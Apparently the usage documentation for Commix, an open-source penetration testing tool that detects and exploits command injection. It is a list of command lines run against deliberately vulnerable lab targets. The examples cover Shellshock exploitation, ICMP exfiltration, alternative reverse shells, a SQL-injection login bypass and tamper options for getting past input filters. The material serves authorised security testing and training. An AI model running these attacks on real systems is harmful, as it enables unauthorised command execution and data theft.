Commix

https://github.com/commixproject/commix

Commix (short for [comm]and [i]njection e[x]ploiter) is an open source penetration testing tool, written by Anastasios Stasinopoulos (@ancst), that automates the detection and exploitation of command injection vulnerabilities.

Usage Examples

1. Exploiting Damn Vulnerable Web App:

root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

2. Exploiting php-Charts 1.0 using injection payload prefix and suffix strings:

root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"

3. Exploiting OWASP Mutillidae using extra headers and HTTP proxy:

root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

4. Exploiting Persistence:

  1. Using the ICMP exfiltration technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"
  2. Using an alternative (python) shell:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"

5. Exploiting Damn Vulnerable NodeJS Application (DVNA):

root@kali:~/commix# python commix.py --url "http://127.0.0.1:9090/app/ping" --data "address=127.0.0.1" --cookie="connect.sid=s%3AIdvte5ieuGQC5C8jt5aSyUTSF8xZtls8.3fwCVsyypx%2BLGXtiF1JTBrqbmjp%2B29vwKoL0uxcHub8" -v1

6. Exploiting Kioptrix: Level 1.1 (#2):

root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"

7. Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:

root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"

8. Exploiting CVE-2014-6271/Shellshock:

root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock

9. Exploiting commix-testbed (cookie) using cookie-based injection:

root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"

10. Exploiting commix-testbed (user-agent) using User-Agent-based injection:

root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3

11. Exploiting commix-testbed (referer) using Referer-based injection:

root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3

12. Exploiting Flick 2 using custom headers and the base64 encoding option:

root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64

13. Exploiting commix-testbed (JSON-based) using JSON POST data:

root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'

14. Exploiting SickOs 1.1 using the shellshock module and an HTTP proxy:

root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"

Filter Bypasses

Note: The following filter bypasses are based on the dockerized version of commix-testbed.

  1. Filter lax_domain_name.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/lax_domain_name.php" --data="addr=127.0.0.1" --prefix="a.b.c" --suffix="d.e.f"
  2. Filter nested_quotes.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/nested_quotes.php" --data="addr=127.0.0.1" --prefix="\"" --suffix="\""
  3. Filter no_space.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_space.php" --data="addr=127.0.0.1" --tamper="space2ifs"
  4. Filter no_space_no_colon_no_pipe_no_ampersand.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab"
  5. Filter no_space_no_colon_no_pipe_no_ampersand_no_dollar.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand_no_dollar.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab"
  6. Filter no_colon_no_pipe_no_ampersand_no_dollar.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_colon_no_pipe_no_ampersand_no_dollar.php" --data="addr=127.0.0.1"
  7. Filter no_white_chars.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars.php" --data="addr=127.0.0.1" --tamper="space2ifs"
  8. Filter no_white_chars_start_alphanum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars_start_alphanum.php" --data="addr=127.0.0.1" --tamper="space2ifs" --prefix="abc"
  9. Filter no_white_chars_stop_alnum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars_stop_alnum.php" --data="addr=127.0.0.1" --tamper="space2ifs"
  10. Filter simple_stop_alphanum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/simple_stop_alphanum.php" --data="addr=127.0.0.1" --prefix="abc"
  11. Filter simple_start_alphanum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/simple_start_alphanum.php" --data="addr=127.0.0.1"
  12. Filter multiple_os_commands_blacklisting.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/multiple_os_commands_blacklisting.php" --data="addr=127.0.0.1" --tamper="uninitializedvariable"